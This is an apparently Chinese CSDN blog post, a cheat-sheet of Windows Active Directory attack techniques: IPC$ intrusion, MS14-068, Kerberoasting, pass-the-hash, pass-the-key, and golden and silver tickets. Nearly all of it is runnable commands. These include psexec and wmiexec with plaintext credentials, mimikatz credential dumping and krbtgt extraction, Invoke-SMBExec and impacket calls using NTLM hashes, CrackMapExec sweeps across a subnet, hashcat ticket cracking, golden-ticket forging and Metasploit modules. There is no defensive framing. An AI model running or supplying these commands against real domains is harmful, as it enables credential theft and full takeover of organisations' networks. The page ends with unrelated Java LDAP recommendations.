java获取当前域账号_域渗透安全之IPC MS14068 Pth Ptt Ptk Kerberoating

最新推荐文章于 2021-03-14 12:31:18 发布
最新推荐文章于 2021-03-14 12:31:18 发布
阅读量467 收藏
点赞数
文章标签: java获取当前域账号
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28693309/article/details/112083454
版权

IPC

IPC$入侵

  • 建立非空连接
  • 新建批处理
  • Copy命令上传
  • 查看目标靶机时间
  • 通过at命令在特定时间执行批处理文件
  • 在目标靶机上查看

其他命令

  • 将目标共享建立一个映射g盘 netuseg:192.168.3.68c$
  • 查看已建立的会话

通过工具进行会话连接执行

psexec.exe  192.168.1.108   cmd  -uadministrator   -p  123456
csript.exe  wmiexec.vbs   /shell   192.168.1.108   administrator   123456

返回一个cmd交互界面执行即可

MS14068

  • 首先尝试访问域控共享文件夹 拒绝访问
  • 使用ms16048

-u域账号+@+域名称 -p为当前用户的密码,即ts1的密码 -s为ts1的SID值,可以通过whoami/all来获取用户的SID值-d为当前域的域控

  • 生成ccache文件
  • 删除当前缓存的kerboeos票据 kerberos::purge
  • 导入ccache文件 kerberos::ptc
  • 再次访问域控共享文件

Kerberoating

早期kerberoating

工具 Kerberoast工具包 Mimikatz

  • 使用Kerberoast工具包GetUserPNs.ps1进行SPN扫描
3c4701f4a3c147a9feb0026e02f384a9.png
  • 根据微软提供的类KerberosRequeststorSecurityToken发起Kerberos请求申请票据 Add-Type-AssemblyNameSystem.IdentityModel New-ObjectSystem.IdentityModel.Tokens.KerberosRequestorSecurityToken-ArgumentList"MSSQLSvc/SRC_DB_ODAY.org:1433"
  • 通过klist命令查看当前会话存储的Kerberos票据 klist
  • 使用mimikatz导出 kerberos::list/export
  • 使用kerberoast 工具集中的 tgsrepcrack.py 工具进行离线爆破 python tgsrepcrack.py list1.txt2-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi

kerberoating新姿势

工具 Invoke-Kerberoast.ps1 HashCat

  • 转为Hashcat格式 Invoke-kerberoast–outputformat hashcat|fl
  • 保存 nvoke-Kerberoast-OutputformatHashcat|fl>test1.txt
  • Hashcat爆破 hashcat64.exe–m13100test1.txt password.list--force

Pth

Pass the hash

  • 使用mimikatz先获取hash
privilege::debug
sekurlsa::logonpasswords
f928782d85c5dfb1485d8f5f1e4f00eb.png
  • 攻击机执行
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:SRV-DB-0DAY /ntlm:ac307fdeab3e8307c3892c163a7808d5"
5cb170720b47431bff7785be3ea876c1.png
  • 验证pth
4243ac166864e4fc50bc3aa8e735bdb6.png

wmiexec

  • Invoke-SMBExec
https://github.com/Kevin-Robertson/Invoke-TheHashInvoke-WMIExec -Target 192.168.3.21 -Domain workgroup -Username administrator -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose
  • Invoke-SMBExec
Invoke-SMBExec -Target 192.168.3.21 -Domain test.local -Username test1 -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose

如果只有SMB文件共享的权限,没有远程执行权限,可以使用该脚本

  • wmiexec.py
https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.pyhttps://github.com/maaaaz/impacket-examples-windows
wmiexec -hashes 00000000000000000000000000000000:ccef208c6485269c20db2cad21734fe7 workgroup/administrator@192.168.3.21 "whoami"

普通用户可用

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec.git
crackmapexec 192.168.3.0/24 -u administrator -H ccef208c6485269c20db2cad21734fe7

Ptk

对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NT hash

  • 获取用户的aes key
mimikatz "privilege::debug" "sekurlsa::ekeys"
3849d31a8b93d40d71ee710fdbb675b5.png
  • 注入aes key
mimikatz "privilege::debug" "sekurlsa::pth /user:sqlsvr /domain:0DAY.ORG /aes256:bf2cab4e27a426c9ec9d21c919f119843415ee5d98587063d6e48d16633c5436"
9e3bbc0e4dd470f6b138aca6609c99ef.png

Ptt

Golden ticket(黄金票据)

前提: 域名称 域SID krbtgt账户密码 伪造用户名

  • dump krbtgt hash
privilege::debuglsadump::lsa /patch
86dc9930883e8a682ab2517318226a4e.png
  • 生成ticket
kerberos::golden  /admin:administrator  /domain:0day.org /sid: S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2  /ticket:test.kiribi
2f38fc6cb54d8fbf1a793063dbe3f2e6.png
  • 注入凭据
kerberos::ptt test.kirbi
7946b68cee9db32bdaa3a71410fb644c.png
  • 验证Golden ticket
56a4a4141c3228f542f112654ddefba8.png

golden ticket(白银票据)

前提: 域名称 域SID 域的服务账户的密码hash 伪造用户名

  • dump server hash
privilege::debugsekurlsa::logonpasswords
e20356eeac134e5d143491af8c68fef2.png
  • 导入凭证
kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:192.168.3.142 /rc4:74cca677f85c7c566352fd846eb0d82a  /service:cifs /user:syst1m /ptt
  • 验证
c9041c989cfd3060e90cff95eebdc2d4.png

Tips

mimikatz复制粘贴困难,可使用如>>log.txt
exploit/windows/smb/psexec 使用hash传递
post/windows/gather/smart_hashdump 读取hash
.domain_list_gen 获取域管理账户列表
auxiliary/gather/kerberos_enumusers 用户名枚举
auxiliary/admin/kerberos/ms14_068_kerberos_checksum 14068
load kiwikerberos_ticket_use /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi kiwi扩展来导入TGT票证参考:https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit/
  • Mimikatz
load mimikatz 加载mimikatz_command -f version  版本mimikatz_command -f fu 获取可用模块列表msv 检索msv凭证wdigest 读取密码kerberos 尝试检索kerberos凭据

看到了再加~

霏霏落到湃湃
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java获取ad用户信息_JAVA 通过LDAP获取AD用户及组织信息
weixin_31281613的博客
02-13 1157
因为工作需求近期做过一个从客户AD获取数据实现单点登录的功能,在此整理分享。前提:用户可能有很多系统的情况下,为了方便账号的统一管理使用AD验证登录,所以不需要我们的系统登录,就需要获取用户的AD组织和用户信息,实现认证和单点登录。LDAP: LDAP是轻量目录访问协议AD:微软基于模式的集中化管理1.常规的AD登陆验证LdapContext dc = null;Hashtable ...
java获取控下账号例子介绍ldap中概念
liaomin416100569的专栏
01-27 6912
package encode;import java.util.Hashtable;import javax.naming.Context;import javax.naming.ldap.LdapContext;import javax.naming.ldap.InitialLdapContext;import javax.naming.NamingEnumeration;import javax.naming.directory.SearchControls;import javax.naming.di
java web 项目 获取客户端 账户和计算机名
weixin_34342578的博客
03-08 1296
String auth = request.getHeader("Authorization");if (auth == null){response.setStatus(response.SC_UNAUTHORIZED);response.setHeader("WWW-Authenticate", "NTLM");response.flushBuff...
java获取账号下的用户完整版
liaomin416100569的专栏
02-12 7074
java获取账号下的用户完整版package encode;import java.util.Hashtable;import javax.naming.Context;import javax.naming.ldap.LdapContext;import javax.naming.ldap.InitialLdapContext;import javax.naming.NamingEnumeration;import javax.naming.directory.SearchControls;import
java 获取客户端的用户名,用 Javascript 获取客户端的用户名、计算机名
weixin_34609222的博客
03-14 1314
Javascript 获取客户端的用户名、计算机名发布于2020-05-13阅读1,014具体方法如下:var shell = new ActiveXObject("WScript.Shell");console.log('计算机名 = ' , shell.ExpandEnvironmentStrings("%COMPUTERNAME%"));console.log('登录用户名...
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,横向PTHPTKPTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
ctdet_coco_dla_2x.pth
12-28
《深度学习中的预训练模型:ctdet_coco_dla_2x.pth》 在现代计算机视觉领,预训练模型已经成为解决复杂任务的关键工具。本文将深入探讨“ctdet_coco_dla_2x.pth”,一个在GoogleDrive上共享的预训练模型,其主要...
sipmask_r50_caffe_fpn_gn_ms_1x.pth
08-02
sigmask算法pytorch模型,https://arxiv.org/pdf/2007.14772.pdf,论文名称:SipMask: Spatial Information Preservation for Fast Image and Video Instance Segmentation (ECCV2020)
fasterrcnn_resnet50_fpn_coco-258fb6c6.pth
09-01
fasterrcnn_resnet50_fpn_coco-258fb6c6.pth fasterrcnn_resnet50_fpn_coco-258fb6c6.pthfasterrcnn_resnet50_fpn_coco-258fb6c6.pthfasterrcnn_resnet50_fpn_coco-258fb6c6.pth
Java使用LdAP获取AD用户
weixin_34417183的博客
01-26 462
/** * @Description: * * @Title: LdAPTest.java * @Package com.joyce.itext.main * @Copyright: Copyright (c) 2014 * * @author Comsys-LZP * @date 2014-8-7 上午10:20:22 * @version V2.0 ...
java验证AD用户登录
01-09
验证AD用户登录 ,传入用户名(userName)和密码(password)进行验证。
java账号登录_java访问ldap
09-25
java账号登录-java访问ldap; 有详细的注释说明,只有一个java文件,不是整个项目
java 获取ad信息_java 根据OU获取Windows的AD账户
weixin_34796621的博客
02-24 501
import java.util.Hashtable;import javax.naming.Context;import javax.naming.NamingEnumeration;import javax.naming.NamingException;import javax.naming.directory.Attribute;import javax.naming.directory.S...
java获取用户_java获取AD用户信息
weixin_35761503的博客
02-12 623
java如何获取AD用户信息?http://aa00aa00.iteye.com/blog/1276936http://blog.sina.com.cn/s/blog_6ef2c4540100nuvq.htmlpackagecom.webservice.message;importjava.util.Hashtable;importjavax.naming.Context;importjavax...
java 获取客户端的用户名_使用java有没有办法提取局网中的客户端的用户名,客户端是以用户身份进去的...
weixin_30920907的博客
02-16 398
可以在客户端进行获取.获取的方法如下:packagetest;importjava.io.*;publicclassTest{publicstaticStringgetUserName(){try{Stringcmd="cmd/cecho%username%";Processproc=Runtime.getRuntime()....
java读取服务器用户
qq_37497275的博客
09-28 1714
1.服务器的简单介绍 1.1 AD 服务 什么是目录(directory)呢? 日常生活中使用的电话薄内记录着亲朋好友的姓名、电话与地址等数据,它就是 telephone directory(电话目录);计算机中的文件系统(file system)内记录着文件的文件名、大小与日期等数据,它就是 file directory(文件目录)。 如果这些目录内的数据能够由系统加以整理,用户就能...
java 账户_Java访问账号Ldap登录
weixin_35338620的博客
02-19 616
package com.java.basic.service.impl;import com.java.dto.ResultMsg;import com.java.utils.EmptyUtils;import java.util.Hashtable;import javax.naming.AuthenticationException;import javax.naming.Context;im...
java获取AD用户信息
lingwing的专栏
05-04 8095
http://aa00aa00.iteye.com/blog/1276936 http://blog.sina.com.cn/s/blog_6ef2c4540100nuvq.html package com.webservice.message; import java.util.Hashtable; import javax.naming.Context; import j
pth.ptt,ptk是什么
最新发布
05-30
pth.pttptk都是Windows系统中用于进行NTLM Hash转储攻击的工具。NTLM Hash是Windows系统中用于进行身份验证的一种方式,攻击者可以使用工具获取用户的NTLM Hash值,然后通过破解获取明文密码或者利用哈希转储攻击获得访问权限。其中,pth.ptt是Pass-the-Hash的缩写,用于使用NTLM Hash值直接进行身份验证。而ptk则是Pass-the-Ticket的缩写,用于利用Kerberos票据进行身份验证,可绕过NTLM身份验证,提高攻击效率。这两种工具都是黑客进行渗透测试时会使用的工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值